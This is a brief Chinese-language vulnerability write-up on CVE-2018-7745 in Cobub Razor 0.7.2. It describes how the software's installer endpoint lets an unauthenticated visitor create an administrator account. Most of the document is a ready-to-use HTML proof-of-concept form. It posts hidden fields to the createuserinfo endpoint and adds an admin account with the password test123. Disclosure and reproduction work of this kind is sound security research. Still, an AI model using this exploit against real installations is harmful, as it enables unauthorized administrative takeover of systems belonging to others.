

（CVE-2018-7745）Cobub Razor 0.7.2 越权增加管理员账户¶

一、漏洞简介¶

Cobub Razor 0.7.2越权增加管理员账户漏洞，在不登录的情况下发送特定数据包，可新增管理员账号。保存如下利用代码为html页面，打开页面将增加test/test123的管理员账号，漏洞发现者已经将漏洞信息通过issues告知作者。

二、漏洞影响¶

Cobub Razor 0.7.2

三、复现过程¶

POC¶

&lt;html&gt;
  &lt;body&gt;
  &lt;script&gt;history.pushState('', '', '/')&lt;/script&gt;
    &lt;form action="http://www.0-sec.org/index.php?/install/installation/createuserinfo" method="POST"&gt;
      &lt;input type="hidden" name="siteurl" value="http://127.0.0.1/" /&gt;
      &lt;input type="hidden" name="superuser" value="test" /&gt;
      &lt;input type="hidden" name="pwd" value="test123" /&gt;
      &lt;input type="hidden" name="verifypassword" value="test123" /&gt;
      &lt;input type="hidden" name="email" value="12@qq.com" /&gt;
      &lt;input type="submit" value="Submit request" /&gt;
    &lt;/form&gt;
  &lt;/body&gt;
&lt;/html&gt;